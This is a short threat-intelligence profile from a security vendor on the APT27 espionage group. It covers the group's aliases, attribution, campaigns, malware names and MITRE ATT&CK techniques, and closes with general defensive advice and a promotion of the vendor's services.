APT27 is a PRC state-sponsored espionage group active since at least 2010, targeting government agencies, defense contractors, and technology companies worldwide. The group is known for its custom tooling including SysUpdate RAT, HyperBro backdoor, and exploitation of web-facing applications for initial access.
| Attribute | Detail |
|---|---|
| Names | APT27 / Emissary Panda / Lucky Mouse |
| Attribution | PRC State-Sponsored |
| Active Since | 2010 |
| Primary Focus | Espionage targeting government, defense, technology. Known for SysUpdate RAT and HyperBro backdoor. |
Overview
APT27 is a PRC state-sponsored espionage group active since at least 2010, targeting government agencies, defense contractors, and technology companies worldwide. The group is known for its custom tooling including SysUpdate RAT, HyperBro backdoor, and exploitation of web-facing applications for initial access.
Attribution
APT27 / Emissary Panda / Lucky Mouse is attributed to PRC State-Sponsored, active since at least 2010. Espionage targeting government, defense, technology. Known for SysUpdate RAT and HyperBro backdoor.
Notable Campaigns
- Operation Iron Tiger — defense and technology espionage
- Government sector targeting across Asia, Europe, and North America
- Exploitation of SharePoint and Exchange servers for initial access
- HyperBro backdoor deployment campaigns
- Ransomware operations as cover for espionage (2021)
MITRE ATT&CK Mapping
| Technique ID | Technique | Confidence |
|---|---|---|
T1190 | Exploit Public-Facing Application | High |
T1059 | Command and Scripting Interpreter | High |
T1105 | Ingress Tool Transfer | High |
T1071 | Application Layer Protocol | High |
T1036 | Masquerading | High |
Detection & Defense
Monitor for the TTPs listed above using your SIEM and EDR platforms. Prioritize patching of internet-facing applications and enforce MFA on all remote access. Mjolnir Security provides continuous threat hunting and monitoring for APT27 activity patterns.
Mjolnir Security — Threat Intelligence & Response
Mjolnir Security provides 24/7 threat monitoring, incident response, and threat intelligence services. Contact us for threat hunting specifically targeting APT27 TTPs in your environment.
mjolnirsecurity.com — 24/7 Incident Response Hotline: +1 833 403 5875